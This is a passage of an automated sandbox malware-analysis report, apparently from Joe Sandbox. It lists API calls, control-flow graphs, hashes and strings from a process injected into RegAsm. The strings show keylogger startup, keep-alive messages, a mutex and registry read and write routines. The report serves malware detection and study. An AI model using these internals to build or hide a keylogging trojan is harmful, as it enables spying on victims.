                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LongNamePath
                                                                                                        • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                        • API String ID: 82841172-425784914
                                                                                                        • Opcode ID: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                                        • Instruction ID: db29472287e64cad03ac4489520097095d7cef5d056ecb8d0020da3553efca3c
                                                                                                        • Opcode Fuzzy Hash: f85e029fdd0af06f03fccea21248521babeaaf2e92215739b0c3fee69db463eb
                                                                                                        • Instruction Fuzzy Hash: 0A4151715082019AC205F765DC96CAAB7B8AE90758F10053FB146B20E2FFBCAE4DC65B

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1322 44acc9-44ace2 1323 44ace4-44acf4 call 4467e6 1322->1323 1324 44acf8-44acfd 1322->1324 1323->1324 1334 44acf6 1323->1334 1325 44acff-44ad07 1324->1325 1326 44ad0a-44ad2e MultiByteToWideChar 1324->1326 1325->1326 1328 44ad34-44ad40 1326->1328 1329 44aec1-44aed4 call 43502b 1326->1329 1331 44ad94 1328->1331 1332 44ad42-44ad53 1328->1332 1338 44ad96-44ad98 1331->1338 1335 44ad55-44ad64 call 457210 1332->1335 1336 44ad72-44ad83 call 4461b8 1332->1336 1334->1324 1341 44aeb6 1335->1341 1349 44ad6a-44ad70 1335->1349 1336->1341 1350 44ad89 1336->1350 1338->1341 1342 44ad9e-44adb1 MultiByteToWideChar 1338->1342 1344 44aeb8-44aebf call 435ecd 1341->1344 1342->1341 1343 44adb7-44adc9 call 448c33 1342->1343 1351 44adce-44add2 1343->1351 1344->1329 1353 44ad8f-44ad92 1349->1353 1350->1353 1351->1341 1354 44add8-44addf 1351->1354 1353->1338 1355 44ade1-44ade6 1354->1355 1356 44ae19-44ae25 1354->1356 1355->1344 1357 44adec-44adee 1355->1357 1358 44ae27-44ae38 1356->1358 1359 44ae71 1356->1359 1357->1341 1360 44adf4-44ae0e call 448c33 1357->1360 1362 44ae53-44ae64 call 4461b8 1358->1362 1363 44ae3a-44ae49 call 457210 1358->1363 1361 44ae73-44ae75 1359->1361 1360->1344 1375 44ae14 1360->1375 1366 44ae77-44ae90 call 448c33 1361->1366 1367 44aeaf-44aeb5 call 435ecd 1361->1367 1362->1367 1374 44ae66 1362->1374 1363->1367 1378 44ae4b-44ae51 1363->1378 1366->1367 1380 44ae92-44ae99 1366->1380 1367->1341 1379 44ae6c-44ae6f 1374->1379 1375->1341 1378->1379 1379->1361 1381 44aed5-44aedb 1380->1381 1382 44ae9b-44ae9c 1380->1382 1383 44ae9d-44aead WideCharToMultiByte 1381->1383 1382->1383 1383->1367 1384 44aedd-44aee4 call 435ecd 1383->1384 1384->1344
                                                                                                        APIs
                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044AD23
                                                                                                        • __alloca_probe_16.LIBCMT ref: 0044AD5B
                                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD92,?,?,?,0044AF1A,00000001,00000001,?), ref: 0044ADA9
                                                                                                        • __alloca_probe_16.LIBCMT ref: 0044AE40
                                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AEA3
                                                                                                        • __freea.LIBCMT ref: 0044AEB0
                                                                                                          • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                        • __freea.LIBCMT ref: 0044AEB9
                                                                                                        • __freea.LIBCMT ref: 0044AEDE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 3864826663-0
                                                                                                        • Opcode ID: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                                                                        • Instruction ID: de232b2c18f644b0009b05ef7aad101f1c584e700cc6948cb3d999d9ae9be8cc
                                                                                                        • Opcode Fuzzy Hash: 276b4224ba7534166915209a775ab474993eb6b0505c2e4c67818911aa509b1e
                                                                                                        • Instruction Fuzzy Hash: 41514C72A80206AFFB258F64CC41EBF77A9DB44750F25462EFC14D7240EB38DC60869A

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1387 41c482-41c493 1388 41c495-41c498 1387->1388 1389 41c4ab-41c4b2 1387->1389 1391 41c4a1-41c4a9 1388->1391 1392 41c49a-41c49f 1388->1392 1390 41c4b3-41c4cc CreateFileW 1389->1390 1393 41c4d2-41c4d7 1390->1393 1394 41c4ce-41c4d0 1390->1394 1391->1390 1392->1390 1396 41c4f2-41c503 WriteFile 1393->1396 1397 41c4d9-41c4e7 SetFilePointer 1393->1397 1395 41c510-41c515 1394->1395 1399 41c505 1396->1399 1400 41c507-41c50e CloseHandle 1396->1400 1397->1396 1398 41c4e9-41c4f0 CloseHandle 1397->1398 1398->1394 1399->1400 1400->1395
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041C4C1
                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0041C4DE
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C4EA
                                                                                                        • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0041C4FB
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0041C508
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                        • String ID: xpF
                                                                                                        • API String ID: 1852769593-354647465
                                                                                                        • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                        • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                                        • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                        • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1401 41b354-41b3ab call 41c048 call 4135e1 call 401fe2 call 401fd8 call 406b1c 1412 41b3ad-41b3d8 call 4135e1 call 401fab StrToIntA 1401->1412 1413 41b3ee-41b3f7 1401->1413 1423 41b3e6-41b3e9 call 401fd8 1412->1423 1424 41b3da-41b3e3 call 41cffa 1412->1424 1414 41b400 1413->1414 1415 41b3f9-41b3fe 1413->1415 1417 41b405-41b410 call 40537d 1414->1417 1415->1417 1423->1413 1424->1423
                                                                                                        APIs
                                                                                                          • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                                                                          • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                          • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                          • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                        • StrToIntA.SHLWAPI(00000000), ref: 0041B3CD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                        • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                        • API String ID: 1866151309-2070987746
                                                                                                        • Opcode ID: 62dfa6f9f345238f46b05bc442edba73b39087c51621fed3685a745c3b5471c1
                                                                                                        • Instruction ID: f33cb4008a08c387480eb48f471200dcc92f04aa72c22424ac0a9b44a4c1d04d
                                                                                                        • Opcode Fuzzy Hash: 62dfa6f9f345238f46b05bc442edba73b39087c51621fed3685a745c3b5471c1
                                                                                                        • Instruction Fuzzy Hash: 8811C47064014926C704B7658C97EFE76198790344F94413BF806A61D3FB6C598683EE

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 1475 40a6b0-40a6c0 1476 40a6c6-40a6c8 1475->1476 1477 40a75d-40a760 1475->1477 1478 40a6cb-40a6f1 call 401f04 CreateFileW 1476->1478 1481 40a731 1478->1481 1482 40a6f3-40a701 GetFileSize 1478->1482 1483 40a734-40a738 1481->1483 1484 40a703 1482->1484 1485 40a728-40a72f CloseHandle 1482->1485 1483->1478 1486 40a73a-40a73d 1483->1486 1487 40a705-40a70b 1484->1487 1488 40a70d-40a714 1484->1488 1485->1483 1486->1477 1491 40a73f-40a746 1486->1491 1487->1485 1487->1488 1489 40a716-40a718 call 40b117 1488->1489 1490 40a71d-40a722 Sleep 1488->1490 1489->1490 1490->1485 1491->1477 1493 40a748-40a758 call 409097 call 40a1b4 1491->1493 1493->1477
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0040A6E6
                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A788), ref: 0040A6F5
                                                                                                        • Sleep.KERNEL32(00002710,?,?,?,0040A788), ref: 0040A722
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 0040A729
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseCreateHandleSizeSleep
                                                                                                        • String ID: XQG
                                                                                                        • API String ID: 1958988193-3606453820
                                                                                                        • Opcode ID: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                                                        • Instruction ID: fa029248b1ac628aedb802b18ed81a98d1a4018e107c0b234daa3009ae89debe
                                                                                                        • Opcode Fuzzy Hash: 3855d95cd7322452e6531401611e332563825ee2f28412b9057315d8b356c682
                                                                                                        • Instruction Fuzzy Hash: 96110130600740AADA31A734988961F7BA9DB45356F44483EF1866B6D3C67DDC64C71F
                                                                                                        APIs
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,0040A2B8,?,00000000,00000000), ref: 0040A239
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040A249
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040A255
                                                                                                          • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                                                                                          • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread$LocalTimewsprintf
                                                                                                        • String ID: Offline Keylogger Started
                                                                                                        • API String ID: 465354869-4114347211
                                                                                                        • Opcode ID: 098326c162aceabd9f0c0eb4b3a82a63fe043fb3064ffd9179b7d27db5e713f4
                                                                                                        • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                                                        • Opcode Fuzzy Hash: 098326c162aceabd9f0c0eb4b3a82a63fe043fb3064ffd9179b7d27db5e713f4
                                                                                                        • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                                        APIs
                                                                                                        • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_00005150,?,00000000,00000000), ref: 00404FE0
                                                                                                        Strings
                                                                                                        • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Create$EventLocalThreadTime
                                                                                                        • String ID: KeepAlive | Enabled | Timeout:
                                                                                                        • API String ID: 2532271599-1507639952
                                                                                                        • Opcode ID: 0f2139c50ef680eb2eec6eafdf8633bec5d9f7b08799dddc17b73162f3ba6cee
                                                                                                        • Instruction ID: 41fa32a9fb91b1633a7afb8999ae97baef60c60c8d6252053b050d354fdafbcf
                                                                                                        • Opcode Fuzzy Hash: 0f2139c50ef680eb2eec6eafdf8633bec5d9f7b08799dddc17b73162f3ba6cee
                                                                                                        • Instruction Fuzzy Hash: 82110A71800385BAC720A7779C0DEAB7FACDBD2714F04046FF54162291D6B89445CBBA
                                                                                                        APIs
                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                                                                        • RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                                                                        • RegCloseKey.KERNEL32(?), ref: 004137EC
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateValue
                                                                                                        • String ID: pth_unenc
                                                                                                        • API String ID: 1818849710-4028850238
                                                                                                        • Opcode ID: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
                                                                                                        • Instruction ID: b09b06e14e5a963f4ed757ac8f346f2723baee7be417271cc0de3610a50c6458
                                                                                                        • Opcode Fuzzy Hash: 4470799dcfde6683a975b44515cd928480e6138ab46ed270d1b1aebcf1de6a3b
                                                                                                        • Instruction Fuzzy Hash: A4F06272500218FBDF00AFA1DC45DEA376CEF04751F108566FD1AA61A1DB359E14DB54
                                                                                                        APIs
                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue), ref: 00448618
                                                                                                        • GetLastError.KERNEL32(?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000,00000364,?,00448367), ref: 00448624
                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044858D,00000000,00000000,00000000,00000000,?,004488B9,00000006,FlsSetValue,0045F170,0045F178,00000000), ref: 00448632
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                        • String ID:
                                                                                                        • API String ID: 3177248105-0
                                                                                                        • Opcode ID: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                        • Instruction ID: 239c22332ac31c5199b3ba4764290be2907fca328f5d1df1ca03bb1201a614b6
                                                                                                        • Opcode Fuzzy Hash: 8f9b5e85c90ff7ccd8dc2bf5dda10acfb836c822a6cf5ef36d60eb5c9189937f
                                                                                                        • Instruction Fuzzy Hash: D401FC32602322EBDB618A78EC4495F7758AF15BA2B22093AF909D3241DF24DC01C6EC
                                                                                                        APIs
                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,0040EC43,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E,00000000,004660CC,00000003,00000000), ref: 0040D0B3
                                                                                                        • GetLastError.KERNEL32 ref: 0040D0BE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateErrorLastMutex
                                                                                                        • String ID: SG
                                                                                                        • API String ID: 1925916568-3189917014
                                                                                                        • Opcode ID: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                                        • Instruction ID: 57749e379dff282fb0cfe370275dd79dddcb706c5168e3a31171962593876721
                                                                                                        • Opcode Fuzzy Hash: 28fa13b7b1caae5192b70daf2f30c6e0a610ddba166525727d25863cd50ab091
                                                                                                        • Instruction Fuzzy Hash: 0DD012B0605700EBDB186770ED5975839559744702F40487AB50FD99F1CBBC88908519
                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                        • RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                        • RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3677997916-0
                                                                                                        • Opcode ID: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                                        • Instruction ID: 0661f39b514c0023b6096d8878825bbc81d19e8e8981dfb5b132c5fecbfe39b6
                                                                                                        • Opcode Fuzzy Hash: 6d7bb055a41a46af3afbf88891c67b332a8db22587d044117d184b09d82707ea
                                                                                                        • Instruction Fuzzy Hash: 4A01D676900228FBCB209B91DC08DEF7F7DDB44B51F004066BB05A2240DA748E45DBA4
                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                                        • RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                                        • RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3677997916-0
                                                                                                        • Opcode ID: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                        • Instruction ID: 3ea041f737baa467864e73cd7e114674dd940ed34319bd14b5ec79364d8ab256
                                                                                                        • Opcode Fuzzy Hash: 1fd388fcba5a36fc4cfbdc9a361dcb97530194601f604bbc1403cef4751c10f9
                                                                                                        • Instruction Fuzzy Hash: 39F01D76900218FFDF109FA09C45FEE7BBDEB04B11F1044A5BA04E6191D6359F549B94
                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 00413551
                                                                                                        • RegQueryValueExA.KERNEL32 ref: 00413565
                                                                                                        • RegCloseKey.KERNEL32(?), ref: 00413570
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3677997916-0
                                                                                                        • Opcode ID: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                        • Instruction ID: 960a54a16a1ccd4152458ec6927d20d37e2092670a33f2d7c306b576a706ad25
                                                                                                        • Opcode Fuzzy Hash: 457a1e9777394aa84a55c62b4c884cbf4b645f8070d1882d45228c3eb86b6271
                                                                                                        • Instruction Fuzzy Hash: 23E06532801238FBDF204FA29C0DDEB7F6CDF06BA1B000155BD0CA1111D2258E50E6E4
                                                                                                        APIs
                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                                                                                                        • RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                                                                                                        • RegCloseKey.ADVAPI32(004660B4), ref: 004138E6
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 1818849710-0
                                                                                                        • Opcode ID: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                        • Instruction ID: 04d77b696783773a8a307df6842786532c8303179302b097fa31242bc3118ae5
                                                                                                        • Opcode Fuzzy Hash: 8a000a4505fdb29c534fdcd469952580260528b50fc1865eb33bc02dff3d936a
                                                                                                        • Instruction Fuzzy Hash: 1EE06D72500318FBDF109FA0DC06FEA7BACEF04B62F104565BF09A6191D6358E14E7A8
                                                                                                        APIs
                                                                                                        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0044EE69
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Info
                                                                                                        • String ID:
                                                                                                        • API String ID: 1807457897-3916222277
                                                                                                        • Opcode ID: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                                        • Instruction ID: 2d4132b881e94a0a9fd0de77a922cbe9b4a8b8c61ff6a95216f325efaac8b060
                                                                                                        • Opcode Fuzzy Hash: c218bb7fec2994ea758599c37fad7e7d2b1b4cc9144a8923480740bb4dc68c2e
                                                                                                        • Instruction Fuzzy Hash: 7E411070504748AFEF218E25CC84AF7BBB9FF45304F2404EEE59987142D2399A46DF65
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _wcslen
                                                                                                        • String ID: pQG
                                                                                                        • API String ID: 176396367-3769108836
                                                                                                        • Opcode ID: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                                                                                        • Instruction ID: e26466b944e621eef81fbe5db30e3e3b172770e45cde188e8c087a2518f8d89f
                                                                                                        • Opcode Fuzzy Hash: 2909f1be4624e20aefd95f70af1697863fb55ab0ff45cf84c0a49d4b96723009
                                                                                                        • Instruction Fuzzy Hash: 631181319002059BCB15EF66E852AEF7BB4AF54314B10413FF446A62E2EF78AD15CB98
                                                                                                        APIs
                                                                                                        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000001,?,?), ref: 00448CA4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: String
                                                                                                        • String ID: LCMapStringEx
                                                                                                        • API String ID: 2568140703-3893581201
                                                                                                        • Opcode ID: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                                        • Instruction ID: c3f282dcf0fd97a5c368a601407465e3bede0a00add2935535d0592c00eac712
                                                                                                        • Opcode Fuzzy Hash: 4e10c201ebb2099c74eb4779768ff64867bf24b434018514e16e99dc8bd4ef65
                                                                                                        • Instruction Fuzzy Hash: 3001253254120CFBCF02AF91DD02EEE7F66EF08751F04416AFE1965161CA3A8971EB99
                                                                                                        APIs
                                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0044BFCF,-00000020,00000FA0,00000000,00467388,00467388), ref: 00448B4F
                                                                                                        Strings
                                                                                                        • InitializeCriticalSectionEx, xrefs: 00448B1F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CountCriticalInitializeSectionSpin
                                                                                                        • String ID: InitializeCriticalSectionEx
                                                                                                        • API String ID: 2593887523-3084827643
                                                                                                        • Opcode ID: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                                                        • Instruction ID: 6b0d226957fc5e3530c80ec385177705bb254131620a7d42d33c8bf65efe755d
                                                                                                        • Opcode Fuzzy Hash: 6340ef5d4d263af2985355ee658efc66a6ef890db148a952ff0e7e01781af4fe
                                                                                                        • Instruction Fuzzy Hash: F0F0E93164021CFBCB025F55DC06E9E7F61EF08B22B00406AFD0956261DF3A9E61D6DD
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Alloc
                                                                                                        • String ID: FlsAlloc
                                                                                                        • API String ID: 2773662609-671089009
                                                                                                        • Opcode ID: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                                        • Instruction ID: f8901b274c9ac7999680b04b2037e580393277d5e39e0d99f0e7f02c98ef4e36
                                                                                                        • Opcode Fuzzy Hash: 8d34d378e792ffc8bee28f5c2a12e2aa67d49de27489c3fe41b8e68b567a8336
                                                                                                        • Instruction Fuzzy Hash: 8FE05530640318F7D3016B21DC16A2FBB94DB04B22B10006FFD0553241EE794D15C5CE
                                                                                                        APIs
                                                                                                        • try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: try_get_function
                                                                                                        • String ID: FlsAlloc
